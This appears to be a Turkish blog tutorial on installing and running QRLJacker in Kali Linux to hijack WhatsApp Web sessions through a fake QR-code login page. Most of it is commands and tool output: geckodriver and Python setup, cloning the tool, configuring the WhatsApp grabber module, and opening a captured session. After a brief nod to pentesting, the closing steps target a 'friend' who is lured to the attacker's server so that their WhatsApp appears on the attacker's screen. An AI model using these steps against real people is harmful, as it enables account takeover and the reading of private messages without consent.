Sosyal Mühendislik saldırıları son hızla çalışıyor. Saldırganların çoğu hedefleri kandırmak için sosyal mühendislik yöntemlerini kullanmaktadır. Bugün sizlere Uygulama Web Oturumlarını elde etmede kullanılan QRLJacker’da sosyal mühendislik yöntemini anlatmaya çalışacağım. Aklınızda bulunsun bu program python ile yazılmış.
QRLJacker, Pentesting’in ilk aşamasında yardımcı olabilecek Whatsapp oturumu ele geçirme işleminde kullanılan en yaygın araçtır.
Bu araç nasıl çalışır?
-Tabiki kimlik avı prensibine göre çalışmaktadır. Yani; kullanıcıların kimlik bilgilerini toplamak için sahte giriş sayfalarının oluşturulduğu bir tür sosyal mühendislik saldırısı olarak nitelendirebiliriz.
Arkadaşlar ben test için VMware Workstation da kurulu Kali Linux 2019.4 amd64 kullanmış bulunmaktayım.
Bu arada Geeko sürücüsü; Mozilla tarafından geliştirilen ve uygulamalarda kullanılan Web tarayıcı motoru olarak görev yapmaktadır.
Selenium (bir python modülü) ve Mozilla tarayıcısı arasında bir bağlantı oluşturur.
Evet gelelim adımlarımıza; Kali’de Terminal açıp,
root@kali:~/ cd Downloads ile Downloads dizinine geçiyoruz, ardından sırasıyla aşagıdaki adımları gerçeleştiriyoruz.
root@kali:~/Downloads# wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
root@kali:~/Downloads# tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
root@kali:~/Downloads# sudo mv -f geckodriver /usr/local/share/geckodriver
root@kali:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
root@kali:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Eğer ki python3.7 yüklü değilse yüklüyoruz. Tabi ki bu arada firefox tarayıcısını güncellemeyi unutmayın. Bunun için;
root@kali:~# sudo apt-get update & sudo apt-get install firefox-esr
Ardından; python3.7 ve pip paketini yüklüyoruz.
root@kali:~# apt-get install python3.7
Sürümlerimizin güncel olduğundan emin olun;
root@kali:~# sudo apt-get update
root@kali:~# sudo apt-get -y upgrade
Yüklü olan Python3 sürümünü kontrol edelim,
root@kali:~# python3 -V
Bende ki sürüm,
root@kali:~# python3 3.7.3rc1
Python için yazılım paketlerini yönetmek için, pip’i yükleyelim,
root@kali:~# sudo apt-get install -y python3-pip
Python paketlerini yazarakta yükleyebilirsin,
root@kali:~# pip3 install package_name
Tabiki programlama ortamımız için sağlam bir kurulum yapmamızı sağlamak için kurulacak birkaç paket ve geliştirme aracıda mevcuttur,
root@kali:~# sudo apt-get install build-essential libssl-dev libffi-dev python-dev
Python paketlerini yükledikten sonra işleme devam edelim,
root@kali:~/Downloads# git clone https://github.com/OWASP/QRLJacking
root@kali:~/Downloads# cd QRLJacking/QRLJacker/
root@kali:~/QRLJacking/QRLJacker# ls
root@kali:~/QRLJacking/QRLJacker# python3.7 -m pip install -r requirements.txt
root@kali:~/QRLJacking/QRLJacker# python3.7 QrlJacker.py
QrlJacker > help
QrlJacker > list
QrlJacker > use grabber/whatsapp
QrlJacker Module(grabber/whatsapp) > options
QrlJacker Module(grabber/whatsapp) > set port 1337
QrlJacker Module(grabber/whatsapp) > set host 172.16.0.55
QrlJacker Module(grabber/whatsapp) > run
QrlJacker Module(grabber/whatsapp) >
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
Qrljacker sunucusunu başladı, bu kısımdan sonra Sosyal Mühendislik yöntemleri ile IP yi arkadaşınıza bir şekilde ulaşmasını sağlıyoruz 🙂
//172.16.0.55:1337
Arkadaşınız Whatsapp QR kodunu tarattığında web otutumu açılmış olacaktır. Bizde sessions kontrol ediyoruz,
QrlJacker Module(grabber/whatsapp) > sessions
ve
ID Module name Capture on
0 Whatsapp Web-Apr-17-11:00:02-2019
QrlJacker Module(grabber/whatsapp) > sessions -i 0 dediğimizde firefox tarayıcımız açılıyor ve arkadaşınızın Whatsapp ‘ı ekranınızda 🙂 İyi Günler…